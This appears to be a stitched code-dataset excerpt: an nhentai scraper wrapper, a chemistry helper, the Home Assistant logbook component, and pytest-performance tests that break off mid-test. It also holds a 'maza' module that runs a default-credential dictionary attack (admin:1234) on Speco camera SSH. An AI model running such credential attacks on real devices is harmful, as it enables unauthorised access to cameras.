"""
SOUP = self._fetch(f'/')
popular_section = SOUP.find('div', class_='index-popular')
DOUJINS = []
for item in popular_section.find_all('div', class_='gallery'):
DOUJIN_ID = item.find('a', class_='cover')['href'].split('/')[2]
POPULAR_DOUJIN = self.get_doujin(DOUJIN_ID)
if POPULAR_DOUJIN is not None:
DOUJINS.append(DoujinThumbnail(id=POPULAR_DOUJIN.id,
media_id=POPULAR_DOUJIN.media_id,
title=POPULAR_DOUJIN.title,
languages=POPULAR_DOUJIN.languages,
cover=POPULAR_DOUJIN.cover,
url=urljoin(self._BASE_URL, f"/g/{POPULAR_DOUJIN.id}"),
tags=POPULAR_DOUJIN.tags))
return PopularPage(doujins=DOUJINS,
total_doujins=len(DOUJINS))
    def get_home_page(self):
raise NotImplementedError
def get_artists(self, page: int = 1) -> ArtistListPage:
raise NotImplementedError
def get_tags(self, page: int = 1) -> TagListPage:
raise NotImplementedError
def get_groups(self, page: int = 1) -> GroupListPage:
raise NotImplementedError
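# Minimal usage sketch (illustrative only: the doujin id below is made up, and a
# working BaseWrapper configuration plus network access are assumed):
#
#   client = NHentai()
#   doujin = client.get_doujin(id='123456')
#   results = client.search(query='houshou marine', page=1, sort=Sort.RECENT)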
| 36.746606
| 119
| 0.550794
|
import logging
from typing import Optional, Union
from urllib.parse import urljoin
from .utils.cache import Cache
from .base_wrapper import BaseWrapper
from .entities.doujin import Doujin, DoujinThumbnail
from .entities.page import (Page,
SearchPage,
TagListPage,
GroupListPage,
CharacterListPage,
ArtistListPage,
PopularPage)
from .entities.links import CharacterLink
from .entities.options import Sort
class NHentai(BaseWrapper):
@Cache(max_age_seconds=3600, max_size=1000, cache_key_position=1, cache_key_name='id').cache
def get_doujin(self, id: str) -> Doujin:
print(f'INFO::Retrieving doujin with id {id}')
id = str(id)
if not id.isnumeric() or id[0] == '0':
            print('ERROR::Maybe you mistyped the doujin id or it does not exist.')
return None
SOUP = self._fetch(urljoin(self._API_URL, f'gallery/{id}'), is_json=True)
if SOUP.get('error'):
            print('ERROR::Maybe you mistyped the doujin id or it does not exist.')
            return None
        print(f'INFO::Successfully retrieved doujin {id}')
return Doujin.from_json(SOUP)
@Cache(max_age_seconds=3600, max_size=15, cache_key_position=1, cache_key_name='page').cache
def get_pages(self, page: int) -> Page:
print(f'INFO::Fetching page {page}')
SOUP = self._fetch(urljoin(self._API_URL, f'galleries/all?page={page}'), is_json=True)
DOUJINS = [DoujinThumbnail.from_json(json_obj) for json_obj in SOUP.get('result')]
PAGES = SOUP.get('num_pages')
PER_PAGE = SOUP.get('per_page')
TOTAL_RESULTS = int(PAGES) * int(PER_PAGE)
return Page(doujins=DOUJINS,
total_results=TOTAL_RESULTS,
total_pages=PAGES,
per_page=PER_PAGE,
page=page)
def get_random(self) -> Doujin:
SOUP = self._fetch(f'/random/')
id = SOUP.find('h3', id='gallery_id').text.replace('#', '')
doujin: Doujin = self.get_doujin(id=id)
return doujin
def search(self, query: str, page: Optional[int]=1, sort: Optional[Sort]=Sort.RECENT) -> Union[SearchPage, Doujin]:
if query.isnumeric():
any_doujin: Doujin = self.get_doujin(id=query)
if any_doujin is not None:
return any_doujin
sort = sort.value if isinstance(sort, Sort) else sort
params = {'query': query, 'page': page, 'sort': sort} if sort is not None else {'query': query, 'page': page}
SOUP = self._fetch(urljoin(self._API_URL, f'galleries/search'), params=params, is_json=True)
DOUJINS = [Doujin.from_json(json_object=doujin) for doujin in SOUP.get('result')]
return SearchPage(query=query,
sort=sort,
total_results=SOUP.get('num_pages')*SOUP.get('per_page'),
total_pages=SOUP.get('num_pages'),
doujins=DOUJINS)
@Cache(max_age_seconds=3600, max_size=15, cache_key_position=1, cache_key_name='page').cache
def get_characters(self, page: int) -> CharacterListPage:
SOUP = self._fetch(f'/characters/?page={page}')
pagination_section = SOUP.find('section', class_='pagination')
TOTAL_PAGES = int(pagination_section.find('a', class_='last')['href'].split('=')[-1])
CHARACTERS = []
character_list_section = SOUP.find('div', class_='container')
section = character_list_section.find_all('section')
for link in section:
for character in link:
try:
TITLE = character.find('span', class_='name').text
CHARACTERS.append(CharacterLink(section=TITLE[0] if not TITLE[0].isnumeric() else '#',
title=TITLE,
url=character['href'],
total_entries=int(character.find('span', class_='count').text)))
except Exception as err:
logging.error(err)
return CharacterListPage(page=page,
total_pages=int(TOTAL_PAGES),
characters=CHARACTERS)
def get_popular_now(self):
SOUP = self._fetch(f'/')
popular_section = SOUP.find('div', class_='index-popular')
DOUJINS = []
for item in popular_section.find_all('div', class_='gallery'):
DOUJIN_ID = item.find('a', class_='cover')['href'].split('/')[2]
POPULAR_DOUJIN = self.get_doujin(DOUJIN_ID)
if POPULAR_DOUJIN is not None:
DOUJINS.append(DoujinThumbnail(id=POPULAR_DOUJIN.id,
media_id=POPULAR_DOUJIN.media_id,
title=POPULAR_DOUJIN.title,
languages=POPULAR_DOUJIN.languages,
cover=POPULAR_DOUJIN.cover,
url=urljoin(self._BASE_URL, f"/g/{POPULAR_DOUJIN.id}"),
tags=POPULAR_DOUJIN.tags))
return PopularPage(doujins=DOUJINS,
total_doujins=len(DOUJINS))
    def get_home_page(self):
raise NotImplementedError
def get_artists(self, page: int = 1) -> ArtistListPage:
raise NotImplementedError
def get_tags(self, page: int = 1) -> TagListPage:
raise NotImplementedError
def get_groups(self, page: int = 1) -> GroupListPage:
raise NotImplementedError
| true
| true
|
1c3e8de387bbb312c047ea617eb3ac0f5779e29a
| 377
|
py
|
Python
|
WtFrac.py
|
Lam3name/TKP4120
|
d433d45841adea50b323d910240a9537e9475b7f
|
[
"CC0-1.0"
] | null | null | null |
WtFrac.py
|
Lam3name/TKP4120
|
d433d45841adea50b323d910240a9537e9475b7f
|
[
"CC0-1.0"
] | null | null | null |
WtFrac.py
|
Lam3name/TKP4120
|
d433d45841adea50b323d910240a9537e9475b7f
|
[
"CC0-1.0"
] | null | null | null |
import scipy.optimize
import numpy as np
import matplotlib.pyplot as plt
import constants as con
def WtFracCO2(alpha):
return ((con.Mw[0])*alpha)/((1+(0.7/0.3))*con.MwMEA)
def WtFracToAbsMol(tot, percent, molarMass):
return((tot*percent)/molarMass*1000) # mol/s
def fracMolToFracWt(tot, percent, molarmass):
return(((tot*percent)*molarmass)/1000) #kg/s
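# Quick illustrative check (the stream numbers below are made up, not exercise
# data): 2.0 kg/s of mixture at 10 wt% CO2 with M = 44.01 g/mol should
# round-trip through the two helpers.
if __name__ == "__main__":
    co2_mol = WtFracToAbsMol(2.0, 0.10, 44.01)    # ~4.54 mol/s
    co2_kg = fracMolToFracWt(co2_mol, 1.0, 44.01) # ~0.20 kg/s
    print(co2_mol, co2_kg)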
| 26.928571
| 56
| 0.70557
|
import scipy.optimize
import numpy as np
import matplotlib.pyplot as plt
import constants as con
def WtFracCO2(alpha):
return ((con.Mw[0])*alpha)/((1+(0.7/0.3))*con.MwMEA)
def WtFracToAbsMol(tot, percent, molarMass):
return((tot*percent)/molarMass*1000)
def fracMolToFracWt(tot, percent, molarmass):
return(((tot*percent)*molarmass)/1000)
| true
| true
|
1c3e8ed1f19607ace9274bfadcb5a2b0fc836964
| 13,931
|
py
|
Python
|
homeassistant/components/logbook.py
|
GotoCode/home-assistant
|
7e39a5c4d50cf5754f5f32a84870ca57a5778b02
|
[
"Apache-2.0"
] | 11
|
2017-09-25T13:11:33.000Z
|
2020-05-16T21:54:28.000Z
|
homeassistant/components/logbook.py
|
GotoCode/home-assistant
|
7e39a5c4d50cf5754f5f32a84870ca57a5778b02
|
[
"Apache-2.0"
] | 125
|
2018-12-11T07:31:20.000Z
|
2021-07-27T08:20:03.000Z
|
homeassistant/components/logbook.py
|
y1ngyang/home-assistant
|
7e39a5c4d50cf5754f5f32a84870ca57a5778b02
|
[
"Apache-2.0"
] | 3
|
2018-05-22T18:52:01.000Z
|
2019-07-18T21:30:45.000Z
|
"""
Event parser and human readable log generator.
For more details about this component, please refer to the documentation at
https://home-assistant.io/components/logbook/
"""
import asyncio
import logging
from datetime import timedelta
from itertools import groupby
import voluptuous as vol
from homeassistant.core import callback
import homeassistant.helpers.config_validation as cv
import homeassistant.util.dt as dt_util
from homeassistant.components import sun
from homeassistant.components.http import HomeAssistantView
from homeassistant.const import (
EVENT_HOMEASSISTANT_START, EVENT_HOMEASSISTANT_STOP, EVENT_STATE_CHANGED,
STATE_NOT_HOME, STATE_OFF, STATE_ON, ATTR_HIDDEN, HTTP_BAD_REQUEST,
EVENT_LOGBOOK_ENTRY)
from homeassistant.core import State, split_entity_id, DOMAIN as HA_DOMAIN
DOMAIN = 'logbook'
DEPENDENCIES = ['recorder', 'frontend']
_LOGGER = logging.getLogger(__name__)
CONF_EXCLUDE = 'exclude'
CONF_INCLUDE = 'include'
CONF_ENTITIES = 'entities'
CONF_DOMAINS = 'domains'
CONFIG_SCHEMA = vol.Schema({
DOMAIN: vol.Schema({
CONF_EXCLUDE: vol.Schema({
vol.Optional(CONF_ENTITIES, default=[]): cv.entity_ids,
vol.Optional(CONF_DOMAINS, default=[]): vol.All(cv.ensure_list,
[cv.string])
}),
CONF_INCLUDE: vol.Schema({
vol.Optional(CONF_ENTITIES, default=[]): cv.entity_ids,
vol.Optional(CONF_DOMAINS, default=[]): vol.All(cv.ensure_list,
[cv.string])
})
}),
}, extra=vol.ALLOW_EXTRA)
ALL_EVENT_TYPES = [
EVENT_STATE_CHANGED, EVENT_LOGBOOK_ENTRY,
EVENT_HOMEASSISTANT_START, EVENT_HOMEASSISTANT_STOP
]
GROUP_BY_MINUTES = 15
CONTINUOUS_DOMAINS = ['proximity', 'sensor']
ATTR_NAME = 'name'
ATTR_MESSAGE = 'message'
ATTR_DOMAIN = 'domain'
ATTR_ENTITY_ID = 'entity_id'
LOG_MESSAGE_SCHEMA = vol.Schema({
vol.Required(ATTR_NAME): cv.string,
vol.Required(ATTR_MESSAGE): cv.template,
vol.Optional(ATTR_DOMAIN): cv.slug,
vol.Optional(ATTR_ENTITY_ID): cv.entity_id,
})
def log_entry(hass, name, message, domain=None, entity_id=None):
"""Add an entry to the logbook."""
hass.add_job(async_log_entry, hass, name, message, domain, entity_id)
def async_log_entry(hass, name, message, domain=None, entity_id=None):
"""Add an entry to the logbook."""
data = {
ATTR_NAME: name,
ATTR_MESSAGE: message
}
if domain is not None:
data[ATTR_DOMAIN] = domain
if entity_id is not None:
data[ATTR_ENTITY_ID] = entity_id
hass.bus.async_fire(EVENT_LOGBOOK_ENTRY, data)
@asyncio.coroutine
def setup(hass, config):
    """Set up the logbook component."""
@callback
def log_message(service):
"""Handle sending notification message service calls."""
message = service.data[ATTR_MESSAGE]
name = service.data[ATTR_NAME]
domain = service.data.get(ATTR_DOMAIN)
entity_id = service.data.get(ATTR_ENTITY_ID)
message.hass = hass
message = message.async_render()
async_log_entry(hass, name, message, domain, entity_id)
hass.http.register_view(LogbookView(config.get(DOMAIN, {})))
yield from hass.components.frontend.async_register_built_in_panel(
'logbook', 'logbook', 'mdi:format-list-bulleted-type')
hass.services.async_register(
DOMAIN, 'log', log_message, schema=LOG_MESSAGE_SCHEMA)
return True
class LogbookView(HomeAssistantView):
"""Handle logbook view requests."""
url = '/api/logbook'
name = 'api:logbook'
extra_urls = ['/api/logbook/{datetime}']
def __init__(self, config):
"""Initialize the logbook view."""
self.config = config
@asyncio.coroutine
def get(self, request, datetime=None):
"""Retrieve logbook entries."""
if datetime:
datetime = dt_util.parse_datetime(datetime)
if datetime is None:
return self.json_message('Invalid datetime', HTTP_BAD_REQUEST)
else:
datetime = dt_util.start_of_local_day()
start_day = dt_util.as_utc(datetime)
end_day = start_day + timedelta(days=1)
hass = request.app['hass']
def json_events():
"""Fetch events and generate JSON."""
return self.json(list(
_get_events(hass, self.config, start_day, end_day)))
response = yield from hass.async_add_job(json_events)
return response
class Entry(object):
"""A human readable version of the log."""
def __init__(self, when=None, name=None, message=None, domain=None,
entity_id=None):
"""Initialize the entry."""
self.when = when
self.name = name
self.message = message
self.domain = domain
self.entity_id = entity_id
def as_dict(self):
"""Convert entry to a dict to be used within JSON."""
return {
'when': self.when,
'name': self.name,
'message': self.message,
'domain': self.domain,
'entity_id': self.entity_id,
}
def humanify(events):
    """Generate Entry objects from a list of events.
    Will try to group events if possible:
    - if there are 2+ sensor updates within GROUP_BY_MINUTES, show only the last one
    - if a Home Assistant stop and start happen in the same minute, call it restarted
"""
domain_prefixes = tuple('{}.'.format(dom) for dom in CONTINUOUS_DOMAINS)
# Group events in batches of GROUP_BY_MINUTES
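    # Illustrative grouping (made-up times): events fired at 12:03 and 12:09
    # share minute // GROUP_BY_MINUTES == 0 and land in the same batch, while
    # an event fired at 12:20 starts a new batch.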
for _, g_events in groupby(
events,
lambda event: event.time_fired.minute // GROUP_BY_MINUTES):
events_batch = list(g_events)
# Keep track of last sensor states
last_sensor_event = {}
# Group HA start/stop events
# Maps minute of event to 1: stop, 2: stop + start
start_stop_events = {}
# Process events
for event in events_batch:
if event.event_type == EVENT_STATE_CHANGED:
entity_id = event.data.get('entity_id')
if entity_id.startswith(domain_prefixes):
last_sensor_event[entity_id] = event
elif event.event_type == EVENT_HOMEASSISTANT_STOP:
if event.time_fired.minute in start_stop_events:
continue
start_stop_events[event.time_fired.minute] = 1
elif event.event_type == EVENT_HOMEASSISTANT_START:
if event.time_fired.minute not in start_stop_events:
continue
start_stop_events[event.time_fired.minute] = 2
# Yield entries
for event in events_batch:
if event.event_type == EVENT_STATE_CHANGED:
to_state = State.from_dict(event.data.get('new_state'))
domain = to_state.domain
# Skip all but the last sensor state
if domain in CONTINUOUS_DOMAINS and \
event != last_sensor_event[to_state.entity_id]:
continue
# Don't show continuous sensor value changes in the logbook
if domain in CONTINUOUS_DOMAINS and \
to_state.attributes.get('unit_of_measurement'):
continue
yield Entry(
event.time_fired,
name=to_state.name,
message=_entry_message_from_state(domain, to_state),
domain=domain,
entity_id=to_state.entity_id)
elif event.event_type == EVENT_HOMEASSISTANT_START:
if start_stop_events.get(event.time_fired.minute) == 2:
continue
yield Entry(
event.time_fired, "Home Assistant", "started",
domain=HA_DOMAIN)
elif event.event_type == EVENT_HOMEASSISTANT_STOP:
if start_stop_events.get(event.time_fired.minute) == 2:
action = "restarted"
else:
action = "stopped"
yield Entry(
event.time_fired, "Home Assistant", action,
domain=HA_DOMAIN)
elif event.event_type == EVENT_LOGBOOK_ENTRY:
domain = event.data.get(ATTR_DOMAIN)
entity_id = event.data.get(ATTR_ENTITY_ID)
if domain is None and entity_id is not None:
try:
domain = split_entity_id(str(entity_id))[0]
except IndexError:
pass
yield Entry(
event.time_fired, event.data.get(ATTR_NAME),
event.data.get(ATTR_MESSAGE), domain,
entity_id)
def _get_events(hass, config, start_day, end_day):
"""Get events for a period of time."""
from homeassistant.components.recorder.models import Events, States
from homeassistant.components.recorder.util import (
execute, session_scope)
with session_scope(hass=hass) as session:
query = session.query(Events).order_by(Events.time_fired) \
.outerjoin(States, (Events.event_id == States.event_id)) \
.filter(Events.event_type.in_(ALL_EVENT_TYPES)) \
.filter((Events.time_fired > start_day)
& (Events.time_fired < end_day)) \
.filter((States.last_updated == States.last_changed)
| (States.state_id.is_(None)))
events = execute(query)
return humanify(_exclude_events(events, config))
def _exclude_events(events, config):
"""Get list of filtered events."""
excluded_entities = []
excluded_domains = []
included_entities = []
included_domains = []
exclude = config.get(CONF_EXCLUDE)
if exclude:
excluded_entities = exclude[CONF_ENTITIES]
excluded_domains = exclude[CONF_DOMAINS]
include = config.get(CONF_INCLUDE)
if include:
included_entities = include[CONF_ENTITIES]
included_domains = include[CONF_DOMAINS]
filtered_events = []
for event in events:
domain, entity_id = None, None
if event.event_type == EVENT_STATE_CHANGED:
entity_id = event.data.get('entity_id')
if entity_id is None:
continue
# Do not report on new entities
if event.data.get('old_state') is None:
continue
new_state = event.data.get('new_state')
# Do not report on entity removal
if not new_state:
continue
attributes = new_state.get('attributes', {})
# If last_changed != last_updated only attributes have changed
# we do not report on that yet.
last_changed = new_state.get('last_changed')
last_updated = new_state.get('last_updated')
if last_changed != last_updated:
continue
domain = split_entity_id(entity_id)[0]
# Also filter auto groups.
if domain == 'group' and attributes.get('auto', False):
continue
# exclude entities which are customized hidden
hidden = attributes.get(ATTR_HIDDEN, False)
if hidden:
continue
elif event.event_type == EVENT_LOGBOOK_ENTRY:
domain = event.data.get(ATTR_DOMAIN)
entity_id = event.data.get(ATTR_ENTITY_ID)
if domain or entity_id:
# filter if only excluded is configured for this domain
if excluded_domains and domain in excluded_domains and \
not included_domains:
if (included_entities and entity_id not in included_entities) \
or not included_entities:
continue
# filter if only included is configured for this domain
elif not excluded_domains and included_domains and \
domain not in included_domains:
if (included_entities and entity_id not in included_entities) \
or not included_entities:
continue
# filter if included and excluded is configured for this domain
elif excluded_domains and included_domains and \
(domain not in included_domains or
domain in excluded_domains):
if (included_entities and entity_id not in included_entities) \
or not included_entities or domain in excluded_domains:
continue
# filter if only included is configured for this entity
elif not excluded_domains and not included_domains and \
included_entities and entity_id not in included_entities:
continue
# check if logbook entry is excluded for this entity
if entity_id in excluded_entities:
continue
filtered_events.append(event)
return filtered_events
# pylint: disable=too-many-return-statements
def _entry_message_from_state(domain, state):
"""Convert a state to a message for the logbook."""
# We pass domain in so we don't have to split entity_id again
if domain == 'device_tracker':
if state.state == STATE_NOT_HOME:
return 'is away'
return 'is at {}'.format(state.state)
elif domain == 'sun':
if state.state == sun.STATE_ABOVE_HORIZON:
return 'has risen'
return 'has set'
elif state.state == STATE_ON:
# Future: combine groups and its entity entries ?
return "turned on"
elif state.state == STATE_OFF:
return "turned off"
return "changed to {}".format(state.state)
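# Minimal illustration (hypothetical entities, not part of Home Assistant):
# the helper above only needs the domain and the state object.
if __name__ == '__main__':
    print(_entry_message_from_state('light', State('light.kitchen', STATE_ON)))
    print(_entry_message_from_state('device_tracker',
                                    State('device_tracker.phone', 'work')))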
| 34.397531
| 79
| 0.612375
|
import asyncio
import logging
from datetime import timedelta
from itertools import groupby
import voluptuous as vol
from homeassistant.core import callback
import homeassistant.helpers.config_validation as cv
import homeassistant.util.dt as dt_util
from homeassistant.components import sun
from homeassistant.components.http import HomeAssistantView
from homeassistant.const import (
EVENT_HOMEASSISTANT_START, EVENT_HOMEASSISTANT_STOP, EVENT_STATE_CHANGED,
STATE_NOT_HOME, STATE_OFF, STATE_ON, ATTR_HIDDEN, HTTP_BAD_REQUEST,
EVENT_LOGBOOK_ENTRY)
from homeassistant.core import State, split_entity_id, DOMAIN as HA_DOMAIN
DOMAIN = 'logbook'
DEPENDENCIES = ['recorder', 'frontend']
_LOGGER = logging.getLogger(__name__)
CONF_EXCLUDE = 'exclude'
CONF_INCLUDE = 'include'
CONF_ENTITIES = 'entities'
CONF_DOMAINS = 'domains'
CONFIG_SCHEMA = vol.Schema({
DOMAIN: vol.Schema({
CONF_EXCLUDE: vol.Schema({
vol.Optional(CONF_ENTITIES, default=[]): cv.entity_ids,
vol.Optional(CONF_DOMAINS, default=[]): vol.All(cv.ensure_list,
[cv.string])
}),
CONF_INCLUDE: vol.Schema({
vol.Optional(CONF_ENTITIES, default=[]): cv.entity_ids,
vol.Optional(CONF_DOMAINS, default=[]): vol.All(cv.ensure_list,
[cv.string])
})
}),
}, extra=vol.ALLOW_EXTRA)
ALL_EVENT_TYPES = [
EVENT_STATE_CHANGED, EVENT_LOGBOOK_ENTRY,
EVENT_HOMEASSISTANT_START, EVENT_HOMEASSISTANT_STOP
]
GROUP_BY_MINUTES = 15
CONTINUOUS_DOMAINS = ['proximity', 'sensor']
ATTR_NAME = 'name'
ATTR_MESSAGE = 'message'
ATTR_DOMAIN = 'domain'
ATTR_ENTITY_ID = 'entity_id'
LOG_MESSAGE_SCHEMA = vol.Schema({
vol.Required(ATTR_NAME): cv.string,
vol.Required(ATTR_MESSAGE): cv.template,
vol.Optional(ATTR_DOMAIN): cv.slug,
vol.Optional(ATTR_ENTITY_ID): cv.entity_id,
})
def log_entry(hass, name, message, domain=None, entity_id=None):
hass.add_job(async_log_entry, hass, name, message, domain, entity_id)
def async_log_entry(hass, name, message, domain=None, entity_id=None):
data = {
ATTR_NAME: name,
ATTR_MESSAGE: message
}
if domain is not None:
data[ATTR_DOMAIN] = domain
if entity_id is not None:
data[ATTR_ENTITY_ID] = entity_id
hass.bus.async_fire(EVENT_LOGBOOK_ENTRY, data)
@asyncio.coroutine
def setup(hass, config):
@callback
def log_message(service):
message = service.data[ATTR_MESSAGE]
name = service.data[ATTR_NAME]
domain = service.data.get(ATTR_DOMAIN)
entity_id = service.data.get(ATTR_ENTITY_ID)
message.hass = hass
message = message.async_render()
async_log_entry(hass, name, message, domain, entity_id)
hass.http.register_view(LogbookView(config.get(DOMAIN, {})))
yield from hass.components.frontend.async_register_built_in_panel(
'logbook', 'logbook', 'mdi:format-list-bulleted-type')
hass.services.async_register(
DOMAIN, 'log', log_message, schema=LOG_MESSAGE_SCHEMA)
return True
class LogbookView(HomeAssistantView):
url = '/api/logbook'
name = 'api:logbook'
extra_urls = ['/api/logbook/{datetime}']
def __init__(self, config):
self.config = config
@asyncio.coroutine
def get(self, request, datetime=None):
if datetime:
datetime = dt_util.parse_datetime(datetime)
if datetime is None:
return self.json_message('Invalid datetime', HTTP_BAD_REQUEST)
else:
datetime = dt_util.start_of_local_day()
start_day = dt_util.as_utc(datetime)
end_day = start_day + timedelta(days=1)
hass = request.app['hass']
def json_events():
return self.json(list(
_get_events(hass, self.config, start_day, end_day)))
response = yield from hass.async_add_job(json_events)
return response
class Entry(object):
def __init__(self, when=None, name=None, message=None, domain=None,
entity_id=None):
self.when = when
self.name = name
self.message = message
self.domain = domain
self.entity_id = entity_id
def as_dict(self):
return {
'when': self.when,
'name': self.name,
'message': self.message,
'domain': self.domain,
'entity_id': self.entity_id,
}
def humanify(events):
domain_prefixes = tuple('{}.'.format(dom) for dom in CONTINUOUS_DOMAINS)
for _, g_events in groupby(
events,
lambda event: event.time_fired.minute // GROUP_BY_MINUTES):
events_batch = list(g_events)
last_sensor_event = {}
start_stop_events = {}
for event in events_batch:
if event.event_type == EVENT_STATE_CHANGED:
entity_id = event.data.get('entity_id')
if entity_id.startswith(domain_prefixes):
last_sensor_event[entity_id] = event
elif event.event_type == EVENT_HOMEASSISTANT_STOP:
if event.time_fired.minute in start_stop_events:
continue
start_stop_events[event.time_fired.minute] = 1
elif event.event_type == EVENT_HOMEASSISTANT_START:
if event.time_fired.minute not in start_stop_events:
continue
start_stop_events[event.time_fired.minute] = 2
for event in events_batch:
if event.event_type == EVENT_STATE_CHANGED:
to_state = State.from_dict(event.data.get('new_state'))
domain = to_state.domain
if domain in CONTINUOUS_DOMAINS and \
event != last_sensor_event[to_state.entity_id]:
continue
if domain in CONTINUOUS_DOMAINS and \
to_state.attributes.get('unit_of_measurement'):
continue
yield Entry(
event.time_fired,
name=to_state.name,
message=_entry_message_from_state(domain, to_state),
domain=domain,
entity_id=to_state.entity_id)
elif event.event_type == EVENT_HOMEASSISTANT_START:
if start_stop_events.get(event.time_fired.minute) == 2:
continue
yield Entry(
event.time_fired, "Home Assistant", "started",
domain=HA_DOMAIN)
elif event.event_type == EVENT_HOMEASSISTANT_STOP:
if start_stop_events.get(event.time_fired.minute) == 2:
action = "restarted"
else:
action = "stopped"
yield Entry(
event.time_fired, "Home Assistant", action,
domain=HA_DOMAIN)
elif event.event_type == EVENT_LOGBOOK_ENTRY:
domain = event.data.get(ATTR_DOMAIN)
entity_id = event.data.get(ATTR_ENTITY_ID)
if domain is None and entity_id is not None:
try:
domain = split_entity_id(str(entity_id))[0]
except IndexError:
pass
yield Entry(
event.time_fired, event.data.get(ATTR_NAME),
event.data.get(ATTR_MESSAGE), domain,
entity_id)
def _get_events(hass, config, start_day, end_day):
from homeassistant.components.recorder.models import Events, States
from homeassistant.components.recorder.util import (
execute, session_scope)
with session_scope(hass=hass) as session:
query = session.query(Events).order_by(Events.time_fired) \
.outerjoin(States, (Events.event_id == States.event_id)) \
.filter(Events.event_type.in_(ALL_EVENT_TYPES)) \
.filter((Events.time_fired > start_day)
& (Events.time_fired < end_day)) \
.filter((States.last_updated == States.last_changed)
| (States.state_id.is_(None)))
events = execute(query)
return humanify(_exclude_events(events, config))
def _exclude_events(events, config):
excluded_entities = []
excluded_domains = []
included_entities = []
included_domains = []
exclude = config.get(CONF_EXCLUDE)
if exclude:
excluded_entities = exclude[CONF_ENTITIES]
excluded_domains = exclude[CONF_DOMAINS]
include = config.get(CONF_INCLUDE)
if include:
included_entities = include[CONF_ENTITIES]
included_domains = include[CONF_DOMAINS]
filtered_events = []
for event in events:
domain, entity_id = None, None
if event.event_type == EVENT_STATE_CHANGED:
entity_id = event.data.get('entity_id')
if entity_id is None:
continue
# Do not report on new entities
if event.data.get('old_state') is None:
continue
new_state = event.data.get('new_state')
# Do not report on entity removal
if not new_state:
continue
attributes = new_state.get('attributes', {})
# If last_changed != last_updated only attributes have changed
# we do not report on that yet.
last_changed = new_state.get('last_changed')
last_updated = new_state.get('last_updated')
if last_changed != last_updated:
continue
domain = split_entity_id(entity_id)[0]
# Also filter auto groups.
if domain == 'group' and attributes.get('auto', False):
continue
# exclude entities which are customized hidden
hidden = attributes.get(ATTR_HIDDEN, False)
if hidden:
continue
elif event.event_type == EVENT_LOGBOOK_ENTRY:
domain = event.data.get(ATTR_DOMAIN)
entity_id = event.data.get(ATTR_ENTITY_ID)
if domain or entity_id:
# filter if only excluded is configured for this domain
if excluded_domains and domain in excluded_domains and \
not included_domains:
if (included_entities and entity_id not in included_entities) \
or not included_entities:
continue
# filter if only included is configured for this domain
elif not excluded_domains and included_domains and \
domain not in included_domains:
if (included_entities and entity_id not in included_entities) \
or not included_entities:
continue
# filter if included and excluded is configured for this domain
elif excluded_domains and included_domains and \
(domain not in included_domains or
domain in excluded_domains):
if (included_entities and entity_id not in included_entities) \
or not included_entities or domain in excluded_domains:
continue
# filter if only included is configured for this entity
elif not excluded_domains and not included_domains and \
included_entities and entity_id not in included_entities:
continue
# check if logbook entry is excluded for this entity
if entity_id in excluded_entities:
continue
filtered_events.append(event)
return filtered_events
# pylint: disable=too-many-return-statements
def _entry_message_from_state(domain, state):
# We pass domain in so we don't have to split entity_id again
if domain == 'device_tracker':
if state.state == STATE_NOT_HOME:
return 'is away'
return 'is at {}'.format(state.state)
elif domain == 'sun':
if state.state == sun.STATE_ABOVE_HORIZON:
return 'has risen'
return 'has set'
elif state.state == STATE_ON:
return "turned on"
elif state.state == STATE_OFF:
return "turned off"
return "changed to {}".format(state.state)
| true
| true
|
1c3e8f5ccaa603cbef7cff415ec0d35ca6c9628a
| 829
|
py
|
Python
|
maza/modules/creds/cameras/speco/ssh_default_creds.py
|
ArturSpirin/maza
|
56ae6325c08bcedd22c57b9fe11b58f1b38314ca
|
[
"MIT"
] | 2
|
2020-02-06T20:24:31.000Z
|
2022-03-08T19:07:16.000Z
|
maza/modules/creds/cameras/speco/ssh_default_creds.py
|
ArturSpirin/maza
|
56ae6325c08bcedd22c57b9fe11b58f1b38314ca
|
[
"MIT"
] | null | null | null |
maza/modules/creds/cameras/speco/ssh_default_creds.py
|
ArturSpirin/maza
|
56ae6325c08bcedd22c57b9fe11b58f1b38314ca
|
[
"MIT"
] | null | null | null |
from maza.core.exploit import *
from maza.modules.creds.generic.ssh_default import Exploit as SSHDefault
class Exploit(SSHDefault):
    __info__ = {
        "name": "Speco Camera Default SSH Creds",
        "description": "Module performs a dictionary attack against the Speco Camera SSH service. "
"If valid credentials are found, they are displayed to the user.",
"authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
"devices": (
"Speco Camera",
)
}
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
port = OptPort(22, "Target SSH port")
threads = OptInteger(1, "Number of threads")
defaults = OptWordlist("admin:1234", "User:Pass or file with default credentials (file://)")
| 36.043478
| 96
| 0.624849
|
from maza.core.exploit import *
from maza.modules.creds.generic.ssh_default import Exploit as SSHDefault
class Exploit(SSHDefault):
    __info__ = {
        "name": "Speco Camera Default SSH Creds",
        "description": "Module performs a dictionary attack against the Speco Camera SSH service. "
"If valid credentials are found, they are displayed to the user.",
"authors": (
"Marcin Bury <marcin[at]threat9.com>",
),
"devices": (
"Speco Camera",
)
}
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
port = OptPort(22, "Target SSH port")
threads = OptInteger(1, "Number of threads")
defaults = OptWordlist("admin:1234", "User:Pass or file with default credentials (file://)")
| true
| true
|
1c3e8f781c2f1741b461701bb73d3a842cced438
| 1,523
|
py
|
Python
|
tests/test_performance.py
|
manycoding/pytest-performance
|
f6473d0ac9c6ac58be9a13d2c9955810dc9962e4
|
[
"MIT"
] | 5
|
2020-09-14T12:18:55.000Z
|
2022-01-07T11:36:09.000Z
|
tests/test_performance.py
|
manycoding/pytest-performance
|
f6473d0ac9c6ac58be9a13d2c9955810dc9962e4
|
[
"MIT"
] | 1
|
2021-09-01T15:06:31.000Z
|
2021-09-01T15:06:31.000Z
|
tests/test_performance.py
|
manycoding/pytest-performance
|
f6473d0ac9c6ac58be9a13d2c9955810dc9962e4
|
[
"MIT"
] | 1
|
2021-03-11T15:20:05.000Z
|
2021-03-11T15:20:05.000Z
|
# -*- coding: utf-8 -*-
from _pytest.config import ExitCode
from pytest_performance import SKIP_FLAG
def test_performance(testdir):
# Given
testdir.makepyfile("""
def foo():
return 1
def test_sth(performance):
assert 1 == performance(foo, unit='s')
""")
# When
result = testdir.runpytest()
# Then
assert result.ret == ExitCode.OK
def test_performance_slow(testdir):
# Given
testdir.makepyfile("""
import pytest
import time
from pytest_performance import PerformanceException
def foo():
time.sleep(2)
return 1
def test_sth(performance):
with pytest.raises(PerformanceException):
performance(foo)
""")
# When
result = testdir.runpytest()
# Then
